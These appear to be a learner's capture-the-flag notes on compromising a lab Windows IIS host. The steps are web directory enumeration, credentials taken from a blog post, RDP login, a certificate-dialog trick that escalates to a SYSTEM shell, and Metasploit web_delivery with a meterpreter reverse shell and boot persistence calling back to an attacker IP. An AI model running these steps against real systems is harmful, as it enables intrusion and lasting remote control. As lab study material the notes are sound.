Nmap:
- Default IIS 10.0
- Port 3389
Dirbuster:
dirbuster&http://10.10.57.11:80/
go faster
#file type:
asp
startfound:
/retronavigating there gives us:
by: Wadewhich is a potential username.
In one of the posts he talks about Ready Player One and the avatar name for Wade as his password:
ParzivalPotential login:
wade:parzival
we RDP and login as that user.
Windows Defender stops WinPEAS and PowerUp. Manual enum in:
- Recycle Bin
- Browser History/Saved/Favorites (VERY IMPORTANT, MENTIONED SO MANY TIMES ATP)
We see a program that was deleted
Exploit:
- run program as admin
- Click: Show more details
- Click: Show information about the publisher’s certificate
- Click: Issued by URL
- Wait for the page to fully load then
- Click: Settings> File > Save as
- You can now use the Windows address bar to run a cmd:
- C:\WINDOWS\system32\cmd.exe
- Escalated Privileges
Kali:
We know it has windows defender. Try something different?
msfconsole
use exploit/multi/script/web_delivery
set lhost tun0
set payload windows/meterpreter/reverse_http
set target 2 #PSH
run -j
sessions -i 1meterpreter:
getuid
run persistence -Xrun persistence -X
- Makes the exploit start on system boot
Run this command now with options that allow it to connect back to your host machine should the system reboot. Note, you'll need to create a listener via the handler exploit to allow for this remote connection in actual practice. Congrats, you've now gain full control over the remote host and have established persistence for further operations!
run persistence -X -r 10.10.60.200 -p 9001These are Kali’s IP and port